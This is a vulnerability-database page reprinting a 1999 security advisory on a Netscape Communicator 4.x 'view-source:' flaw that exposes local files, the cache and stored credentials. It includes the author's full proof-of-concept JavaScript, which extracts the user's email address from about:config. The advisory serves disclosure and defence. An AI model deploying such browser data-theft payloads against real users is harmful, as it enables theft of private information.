Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

netscape.view.source.javascript.txt

🗓️ 17 Aug 1999 00:00:00Reported by Georgi GuninskiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

Security flaw in Netscape Communicator allows unauthorized document access via "view-source" URLs.

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Date: Tue, 1 Jun 1999 19:08:49 +0300  
From: Georgi Guninski <[email protected]>  
To: [email protected]  
Subject: Netscape Communicator "view-source:" security vulnerabilities  
  
There is a security vulnerability in Netscape Communicator 4.6 Win95,  
4.07 Linux (probably all 4.x versions) in the way  
it works with "view-source:wysiwyg://1/javascript" URLs. It parses them  
in a "view-source" window.  
The problem is that it allows access to documents included in the parent  
document via  
ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading  
the whole parsed document.  
  
Vulnerabilites:  
  
Browsing local directories  
Reading user's cache  
Reading parsed HTML files  
Reading Netscape's configuration ("about:config") including user's  
email address, mail servers and password.  
Probably others  
  
This vulnerability may be exploited by using HTML email message.  
  
Workaround: Disable JavaScript  
Netscape is notified about the problem.  
  
Demonstration is available at: http://www.nat.bg/~joro/viewsource.html  
  
Regards,  
Georgi Guninski  
http://www.nat.bg/~joro  
http://www.whitehats.com/guninski  
[ Part 2: "Attached Text" ]  
  
[ The following text is in the "koi8-r" character set. ]  
[ Your display is set for the "US-ASCII" character set. ]  
[ Some characters may be displayed incorrectly. ]  
  
There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way it  
works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window. The problem is that it  
allows access to documents included in the parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(). That  
allows reading the whole parsed document.  
Vulnerabilites:  
  
_________________________________________________________________________________________________________________________________  
  
Browsing local directories  
Reading user's cache  
Reading parsed HTML files  
Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.  
Probably others  
  
This vulnerability may be exploited by using HTML email message.  
  
_________________________________________________________________________________________________________________________________  
  
Workaround: Disable JavaScript  
  
_________________________________________________________________________________________________________________________________  
  
This demonstration tries to find your email address, it may take some time.  
  
Written by Georgi Guninski  
  
_________________________________________________________________________________________________________________________________  
  
s="view-source:wysiwyg://1/javascript:s='vvvv&gt&&gt"" +"" +" blur();msg1=\"Your email is: \";  
mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;" +"setTimeout(\"  
" +"for(i=0;i'"; //a=window.open(s); location=s;  
  
  
-----------------------------------------------------------------------------------------------------  
  
<http://www.nat.bg/~joro/viewsource.html>  
  
<HTML>  
<BODY>  
There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way   
it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window.  
The problem is that it allows access to documents included in the parent document via   
ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document.  
<BR>  
Vulnerabilites:  
<HR>  
Browsing local directories<BR>  
Reading user's cache<BR>  
Reading parsed HTML files<BR>  
Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.<BR>  
Probably others<BR>  
<BR>  
This vulnerability may be exploited by using HTML email message.  
<HR>  
Workaround: Disable JavaScript  
<HR>  
This demonstration tries to find your email address, it may take some time.  
<BR><BR>  
<A HREF="http://www.nat.bg/~joro">Written by Georgi Guninski</A>  
<HR>  
<SCRIPT>  
  
s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>vvvv&gt>"  
+"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>"  
+" <SCRIPT>blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;"  
+"setTimeout(\" "  
+"for(i=0;i<charstoread;i++) {"  
+" t=res;"  
+" find(mend);"  
+" for(c=1;c<256;c++) {"  
+" t=res + String.fromCharCode(c);"  
+" if (find(t,true,true)) {"  
+" res=t;"  
+" if (c==32) i=charstoread+1"  
+" } "  
+" }"  
+"}"  
+"res=res.substring(mag.length);"  
+"alert(msg1 + res);"  
+" ;\",3000);</"+"SCRIPT>'";  
//a=window.open(s);  
location=s;  
  
  
</SCRIPT>  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4
netscape communicatorsecurity vulnerabilitydocument accessjavascriptemail exploitation.
23
.json
Report